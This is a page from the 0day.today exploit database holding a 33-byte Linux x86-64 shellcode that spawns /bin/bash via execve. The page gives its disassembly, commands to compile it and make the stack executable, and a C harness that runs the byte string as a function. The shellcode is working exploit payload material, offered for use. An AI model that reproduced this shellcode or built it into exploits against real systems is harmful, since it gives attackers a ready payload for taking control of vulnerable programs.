[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)

Author
AJITH KP
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25662
Category
shellcode
Date add
28-03-2016
Platform
linux/x86-64
/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_x64 - execve(/bin/bash) - 33 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080:   eb 0b                   jmp    0x40008d
  400082:   5f                      pop    rdi
  400083:   48 31 d2                xor    rdx,rdx
  400086:   52                      push   rdx
  400087:   5e                      pop    rsi
  400088:   6a 3b                   push   0x3b
  40008a:   58                      pop    rax
  40008b:   0f 05                   syscall
  40008d:   e8 f0 ff ff ff          call   0x400082
  400092:   2f                      (bad)
  400093:   2f                      (bad)
  400094:   2f                      (bad)
  400095:   2f                      (bad)
  400096:   62                      (bad)
  400097:   69 6e 2f 2f 2f 2f 2f    imul   ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f
  40009e:   62                      .byte 0x62
  40009f:   61                      (bad)
  4000a0:   73 68                   jae    0x40010a
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o bash_shell bash_shell.c
$ execstack -s bash_shell
$ ./bash_shell
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
void main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) sh;
    (int)(*func)();
}

#  0day.today [2024-11-15]  #